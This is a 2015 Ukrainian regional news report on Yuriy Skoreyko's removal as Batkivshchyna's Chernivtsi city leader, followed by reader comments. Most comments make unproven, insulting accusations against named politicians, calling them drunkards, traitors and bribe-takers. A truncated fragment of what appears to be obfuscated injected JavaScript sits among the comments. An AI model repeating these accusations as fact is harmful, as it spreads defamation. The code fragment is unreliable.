Юрія Скорейка звільнили з посади керівника 'Батьківщини' у Чернівцях

Юрія Скорейка звільнили з посади керівника "Батьківщини" у Чернівцях

18.09.2015, 20:21

Юрія Скорейка звільнили з посади керівника Чернівецької міської партійної організації "ВО "Батьківщина". 

Цю інформацію підтвердили у прес-службі обласної організації ВО "Батьківщина". 

"Так, є постанова президії політради "Батьківщини" за підписом Юлії Тимошенко, в якій йдеться про звільнення Юрія Скорейка з посади керівника Чернівецької міської організації партії", - повідомила прес-секретар Маріанна Антонюк. 

Щодо обставин такого рішення політради, у прес-службі пообіцяли повідомити пізніше. 

Нагадаємо, під час подій Революції Гідності Юрія Скорейка називали "рупором чернівецького Євромайдану".

molbuk.ua

1


КОМЕНТАРІ (23)

Та який він там рупор майдану, сидів на площі в Чернівцях і тримався за свій мікрофон, у той час, коли всі патріоти їздили на майдан у Києві. Він ж на майдані жодного разу не був! А коли був найгарячіший час у Чернівцях і захоплювали адміністрацію, то він тоді переховувався. Боягуз і п'яниця. Нарешті батьківщина його позбулася.

avatar

Олександр

18 вересня 2015 18:14

Знаємо цього дєятєля... Продажний пиятик... Добре що вигнали!

avatar

Юля

18 вересня 2015 18:19

нічого крім шкоди скорейко батьківщині не приніс, так шо може воно й на краще. рейтинг партії опустив до найнижчого в області, тому може хоч тепер батьківщина почне підніматися у місті, бо до цього вона була надто слабким гравцем на фоні політичних Ігор інших партій

avatar

Володя

18 вересня 2015 18:19

Ну Слава Богу! Некерований, інфантильний, партію давно не підтримує! В Кіцмані вибори продав Папієву, міську організацію валить, працює на фронттрвиків! 

avatar

Любов

18 вересня 2015 18:21

Ну нарешті

avatar

партієць

18 вересня 2015 18:21

Самопроголошений "голос Майдану". В Києві жодного разу не був!!!! А тут своїми криками і підкилимними інтригами думав урвати шмат влади. А не буде! Всі знають, що це за аморальне сміття

avatar

Ігор

18 вересня 2015 18:24

Ну це давно очікуване рішення. Раніше треба було приймати. Зрадникам немає місця в партії! 

avatar

Прихильник

18 вересня 2015 18:25

Невже керівництво партії нарешті побачило, що собою являє скорейко? Хитрюща і підступна людина.. Ще довго протримався... О це люстрація)  лицемірам не місце в Батьківщині!

avatar

Партійка

18 вересня 2015 18:25

Скорейко продався давно. Спочатку працював на папієва і регіоналів, потім підсів на "підкормку" фронтовиків, на якій так і сидить. Типова тушка і зрадник, і позбутися його треба було давно. Я довго сумнівався у всій чесності батьківщини, коли вони точно бачили, на кого він працює, і все одно тримали його. З'являється оптимізм , що напередодні виборів Батьківщина очищується і все ж таки веде у ради порядних людей. Так тримати!

avatar

Андрій п.

18 вересня 2015 18:27

Бо хто копає яму іншим - сам в неї потрапляє,шановні)  По заслугам) 

avatar

Я

18 вересня 2015 18:28

Свою неприязнь до обласного керівництва Скорейко вже й не приховував перед іншими.. А пан Мунтян занадто довго сподівався,що ця людина таки вірна йому і партії. Треба було попрощатися з підступним ще коли в кіцмані вибори продав.. Але,краще пізно ніж ніколи. Випивати і робити з себе великого дєятєля буде деінде. Батьківщина для людей і від людей 

avatar

В курсі

18 вересня 2015 18:46

Баба з воза - кобилі легше!  Точний вистріл в гниле "звєно ". Чекаємо заміни, яка підніматиме рейтинг і активізовуватиме роботу міського штабу. Віримо!

avatar

За Батьківщину

18 вересня 2015 18:51

Скорейко догрався, не може бути весь час і вашим і нашим. Світити в очі Мунтяну а потім бігти і все зливати Бурбачині,  от і прийшов кінець. Тепер хай погляне як його Бурбак  буде шанувати.....

avatar

Вушко від глечика урвалося

18 вересня 2015 18:55

Та хто його буде шанувати??? Кому він потрібен? Бурбаки перші його пошлють. Все, гра скінчилася. 

avatar

Вася

18 вересня 2015 18:59

Скільки приходив до партійної контори в ляльковому театрі - стільки цей Юрій батькович в кабінетику ще з одним таким самим як він, але з якоїсь іншої партії - не знаю якої сидів у себе в кабінетику і стопарик перевертав. Це робота? Аж мені встидно було це бачити

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

avatar

прихильник партії

18 вересня 2015 19:03

От вчасно. Тепер Батьківщина може з чистим серцем йти на вибори. 

avatar

Марія

18 вересня 2015 19:15

Це хто пустив пушку шо він не був на майдані у Києві? З дуба впали. Був і не раз. При чому ще тоді, коли все починалось...

avatar

qwer

18 вересня 2015 22:27

Шкода. Використали нормальну людину. На мітингах нашого Євромайдану він був найяскравішою особистістю. А тут видно скоро вибори, то вирішили усунути. Дуже підло і низько...

avatar

Петя

18 вересня 2015 22:41

Всі до кінця чекали, що  на мера від Мунтяна і від ВО «Батьківщина» висунуть лідера Майдану Юрія Скорейка. Мунтян зробив по-своєму.Одновірець  Олександр Пуршега йому таки ближчий за кіцманського патріота Скорейка. 

avatar

Одновірець Олександр Пуршега йому таки ближчий

18 вересня 2015 22:56

Юра ще був чоловіком коли починався РУХ але вже тоді було видно що це курва яка шукає собі лише посаду. Але таки вліз в БЮТ і чому ви мовчите про цих долбаних пунтяну. пуцулячок. бандобартошів. які обгадили бют своїми діями на Сторожинецчині до нуля. Оцю гидоту треба гнати разом з цим сраколизом скорейком бо вони такі самі як і він.Може тоді бют хоть трошки підніметься а так поки вони там хер шо буде.Так що думайте бютівці.думайте бо пуде пізно щоб ця гидота не лізла у владу. Слово за вами буковинці.

avatar

Bendera

19 вересня 2015 09:59

Мушу вас розчарувати, бо якраз Мунтян і забув чи може не подумав , що є така чудова, порядна , розумна, толерантна, виважена людина як Олександр Іванович Пуршага, який міг би стаи найкращим мером міста. Тому ми йому нагадали і не Мунтян, а ми, партійці , запропонували кандидатуру Олександра Пуршаги на мера міста. І якщо виборці проголосують, то будуть мати того, хто буде думати за городян і за місто.

avatar

До Одновірця Олександр.......

19 вересня 2015 13:02

От який Мунтян чесний, справедливий, ідеальний керівник, хаха. Це відео показує хто такий мунтян - чи то тупак, чи то брехло https://www.youtube.com/watch?v=Sr80j5HL9sc

avatar

вейвей